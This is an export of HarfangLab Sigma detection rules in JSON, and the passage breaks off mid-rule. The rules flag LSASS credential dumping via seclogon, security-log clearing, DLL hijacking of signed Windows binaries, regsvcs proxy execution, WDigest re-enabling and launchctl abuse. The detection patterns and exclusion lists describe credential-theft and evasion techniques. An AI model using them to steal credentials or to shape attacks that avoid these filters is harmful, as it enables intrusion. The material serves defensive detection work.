"last_update": "2026-03-23T11:45:34.093939Z",
"creation_date": "2026-03-23T11:45:34.093941Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093946Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/antonioCoco/MalSeclogon",
"https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html",
"https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_access_via_seclogon.yml",
"content": "title: LSASS Access via Secondary Logon Service\nid: e249ffec-7cb4-4b9d-97b1-fcfc3d1cd807\ndescription: |\n Detects process accesses to LSASS with suspicious access rights that involve \"seclogon.dll\" in the call trace.\n The SecLogon service can be used to obtain a handle to LSASS, allowing attackers to perform credential dumping while potentially evading common detection methods.\n This technique is implemented by the tool \"MalSeclogon\" for stealthy credential access.\n It is recommended to investigate the source process attempting to access LSASS, to verify if the access was legitimate, and to check for other attempts at credential theft.\nreferences:\n - https://github.com/antonioCoco/MalSeclogon\n - https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html\n - https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2024/11/05\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n SourceImage|endswith: '\\svchost.exe'\n ProcessCommandLine|endswith: '-s seclogon' # Secondary Logon Service process\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains|all:\n - PROCESS_QUERY_LIMITED_INFORMATION\n - PROCESS_QUERY_INFORMATION\n - PROCESS_CREATE_PROCESS\n - PROCESS_DUP_HANDLE\n CallTrace|contains: 'seclogon.dll'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e249ffec-7cb4-4b9d-97b1-fcfc3d1cd807",
"rule_name": "LSASS Access via Secondary Logon Service",
"rule_description": "Detects process accesses to LSASS with suspicious access rights that involve \"seclogon.dll\" in the call trace.\nThe SecLogon service can be used to obtain a handle to LSASS, allowing attackers to perform credential dumping while potentially evading common detection methods.\nThis technique is implemented by the tool \"MalSeclogon\" for stealthy credential access.\nIt is recommended to investigate the source process attempting to access LSASS, to verify if the access was legitimate, and to check for other attempts at credential theft.\n",
"rule_creation_date": "2024-11-05",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e25e5360-7f25-4abb-adb0-d51e46f7b3bf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627838Z",
"creation_date": "2026-03-23T11:45:34.627839Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627844Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_security_log_no_process.yml",
"content": "title: Windows Security Log Cleared\nid: e25e5360-7f25-4abb-adb0-d51e46f7b3bf\ndescription: |\n Detects the Windows Security audit log being cleared by an unknown process.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n Windows Event Logs are a record of a computer's alerts and notifications.\n It is recommended to check for other malicious behavior on the host with the help of the machine's timeline.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2026/01/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 1102\n Source: 'Microsoft-Windows-Eventlog'\n\n # This is handled by the rule b5bd4ea0-bd89-49d6-9867-4f1b6a100c82\n filter_image:\n ProcessImage|contains: '?'\n\n # This is handled by the rule 68dc5935-e8e4-4223-b4ca-abdf6c9864d3\n filter_session:\n user_data.ClientProcessStartKey: '0'\n SessionLogonType: 3\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e25e5360-7f25-4abb-adb0-d51e46f7b3bf",
"rule_name": "Windows Security Log Cleared",
"rule_description": "Detects the Windows Security audit log being cleared by an unknown process.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nWindows Event Logs are a record of a computer's alerts and notifications.\nIt is recommended to check for other malicious behavior on the host with the help of the machine's timeline.\n",
"rule_creation_date": "2026-01-15",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e2746f38-ff8c-47d6-89d6-da6edbd50f8b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589918Z",
"creation_date": "2026-03-23T11:45:34.589925Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589939Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_genvalobj.yml",
"content": "title: DLL Hijacking via genvalobj.exe\nid: e2746f38-ff8c-47d6-89d6-da6edbd50f8b\ndescription: |\n Detects potential Windows DLL Hijacking via genvalobj.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder, so it is found before the genuine system copy.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'genvalobj.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\cryptsp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e2746f38-ff8c-47d6-89d6-da6edbd50f8b",
"rule_name": "DLL Hijacking via genvalobj.exe",
"rule_description": "Detects potential Windows DLL Hijacking via genvalobj.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e2e6edbb-248f-4f1e-b801-8d49da4e6072",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070559Z",
"creation_date": "2026-03-23T11:45:34.070561Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070566Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
"https://attack.mitre.org/techniques/T1218/009/"
],
"name": "t1218_009_regsvcs_dll_load.yml",
"content": "title: Suspicious Proxy Execution via regsvcs.exe\nid: e2e6edbb-248f-4f1e-b801-8d49da4e6072\ndescription: |\n Detects the execution of the legitimate Regsvcs.exe Windows binary, used to register .NET COM assemblies.\n This may be used by attackers to load their DLL files, since regsvcs then calls the DLL's \\\"RegisterClass\\\" function.\n AWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\n Application whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\n This can also be used by program installers in Windows.\n It is recommended to investigate the DLL that was loaded into the process, as well as to analyze the parent process for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\n - https://attack.mitre.org/techniques/T1218/009/\ndate: 2023/01/04\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.009\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Regsvcs\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\regsvcs.exe'\n OriginalFileName: 'regsvcs.exe'\n\n filter_directory:\n CommandLine|contains:\n - ' ?:\\Program Files\\'\n - ' ?:\\Program Files (x86)\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\'\n - ' ?:\\windows\\Microsoft.NET\\assembly\\GAC_64\\'\n\n # Microsoft Configuration Manager\n exclusion_mcm:\n - ParentImage:\n - '?:\\SMS\\bin\\x64\\srvboot.exe'\n - '?:\\SMS\\bin\\x64\\rolesetup.exe'\n - '?:\\Microsoft Configuration Manager\\bin\\X64\\rolesetup.exe'\n - '?:\\Microsoft Configuration Manager\\bin\\X64\\srvboot.exe'\n - '?:\\ConfigMgr\\bin\\X64\\srvboot.exe'\n - 
'?:\\ConfigMgr\\bin\\X64\\rolesetup.exe'\n - '?:\\SCCM\\bin\\X64\\srvboot.exe'\n - '?:\\SCCM\\bin\\X64\\rolesetup.exe'\n - ParentImage|endswith:\n - '\\srvboot.exe'\n - '\\rolesetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_msiexec:\n ParentImage|endswith: '\\msiexec.exe'\n ParentCommandLine|contains:\n - '-Embedding'\n - 'Global\\MSI0000'\n CommandLine|endswith: 'RegSvcs.exe /bootstrap?' # (/bootstrapu, /bootstrapi)\n\n exclusion_ibm:\n ParentImage|endswith: '\\amqidnet.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'IBM United Kingdom Limited'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e2e6edbb-248f-4f1e-b801-8d49da4e6072",
"rule_name": "Suspicious Proxy Execution via regsvcs.exe",
"rule_description": "Detects the execution of the legitimate Regsvcs.exe Windows binary, used to register .NET COM assemblies.\nThis may be used by attackers to load their DLL files, since regsvcs then calls the DLL's \\\"RegisterClass\\\" function.\nAWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\nApplication whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\nThis can also be used by program installers in Windows.\nIt is recommended to investigate the DLL that was loaded into the process, as well as to analyze the parent process for malicious content or actions.\n",
"rule_creation_date": "2023-01-04",
"rule_modified_date": "2025-08-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.009"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e2eebc54-49b7-4df1-b9f9-68a14a40af77",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620558Z",
"creation_date": "2026-03-23T11:45:34.620560Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620564Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_enable_wdigest.yml",
"content": "title: WDigest Authentication Package Enabled\nid: e2eebc54-49b7-4df1-b9f9-68a14a40af77\ndescription: |\n Detects when the WDigest authentication package is re-enabled in the Windows registry.\n WDigest is an authentication package that, when enabled, causes passwords to be stored in cleartext within the LSASS process memory, posing a significant security risk.\n Attackers can exploit this by retrieving cleartext passwords, enabling lateral movement and data exfiltration.\n It is recommended to investigate the source of the registry modification, verify if the enablement is legitimate, and consider disabling WDigest to mitigate the risk of password exposure.\nreferences:\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2020/09/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.defense_evasion\n - attack.t1003.001\n - attack.t1112\n - attack.t1078\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential'\n\n filter_empty:\n Details:\n - 'DWORD (0x00000000)'\n - '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n 
condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e2eebc54-49b7-4df1-b9f9-68a14a40af77",
"rule_name": "WDigest Authentication Package Enabled",
"rule_description": "Detects when the WDigest authentication package is re-enabled in the Windows registry.\nWDigest is an authentication package that, when enabled, causes passwords to be stored in cleartext within the LSASS process memory, posing a significant security risk.\nAttackers can exploit this by retrieving cleartext passwords, enabling lateral movement and data exfiltration.\nIt is recommended to investigate the source of the registry modification, verify if the enablement is legitimate, and consider disabling WDigest to mitigate the risk of password exposure.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e3140523-18e2-4554-8344-2c0ae8a2854c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625614Z",
"creation_date": "2026-03-23T11:45:34.625616Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625620Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md",
"https://attack.mitre.org/techniques/T1569/001/"
],
"name": "t1569_001_launchctl_submit.yml",
"content": "title: Arbitrary Application Executed via Launchctl\nid: e3140523-18e2-4554-8344-2c0ae8a2854c\ndescription: |\n Detects the usage of launchctl to execute an arbitrary application via launchd.\n This could be used by an attacker to execute commands and programs as Launch Agents or Launch Daemons to cover their tracks.\n It is recommended to investigate the program executed by launchctl and any malicious actions it could have taken.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md\n - https://attack.mitre.org/techniques/T1569/001/\ndate: 2022/08/31\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1569.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Launchctl\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # launchctl submit -l malicious -- /System/Applications/Calculator.app/Contents/MacOS/Calculator\n selection:\n Image: '/bin/launchctl'\n # Catch /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/\n CommandLine|contains|all:\n - 'submit'\n - '-l'\n - '--'\n\n exclusion_harfanglab:\n - ProcessParentImage: '/Library/SystemExtensions/????????-????-????-????-????????????/fr.harfanglab.hurukai.agent.macos.systemextension/Contents/MacOS/fr.harfanglab.hurukai.agent.macos'\n - ProcessGrandparentImage: '/Library/SystemExtensions/????????-????-????-????-????????????/fr.harfanglab.hurukai.agent.macos.systemextension/Contents/MacOS/fr.harfanglab.hurukai.agent.macos'\n\n exclusion_hp:\n ProcessParentImage: '/Library/Printers/hp/Frameworks/HPDeviceMonitoring.framework/Versions/*/Helpers/HP Device Monitor Manager.app/Contents/MacOS/HP Device Monitor Manager'\n\n exclusion_logmein:\n ProcessParentImage: '/private/var/tmp/*/Support-LogMeInRescue.app/Contents/MacOS/Support-LogMeInRescue'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: 
strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e3140523-18e2-4554-8344-2c0ae8a2854c",
"rule_name": "Arbitrary Application Executed via Launchctl",
"rule_description": "Detects the usage of launchctl to execute an arbitrary application via launchd.\nThis could be used by an attacker to execute commands and programs as Launch Agents or Launch Daemons to cover their tracks.\nIt is recommended to investigate the program executed by launchctl and any malicious actions it could have taken.\n",
"rule_creation_date": "2022-08-31",
"rule_modified_date": "2025-12-22",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1569.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e33510cf-8461-47e8-bf1b-b41d65212be7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088784Z",
"creation_date": "2026-03-23T11:45:34.088786Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088790Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tapiunattend.yml",
"content": "title: DLL Hijacking via tapiunattend.exe\nid: e33510cf-8461-47e8-bf1b-b41d65212be7\ndescription: |\n Detects potential Windows DLL Hijacking via tapiunattend.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tapiunattend.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e33510cf-8461-47e8-bf1b-b41d65212be7",
"rule_name": "DLL Hijacking via tapiunattend.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tapiunattend.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e33f1e79-2e97-4b0b-a502-044f0da8a201",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097724Z",
"creation_date": "2026-03-23T11:45:34.097726Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097731Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dnscmd.yml",
"content": "title: DLL Hijacking via dnscmd.exe\nid: e33f1e79-2e97-4b0b-a502-044f0da8a201\ndescription: |\n Detects potential Windows DLL Hijacking via dnscmd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dnscmd.exe'\n ImageLoaded|endswith:\n - '\\dnsapi.dll'\n - '\\ncrypt.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - 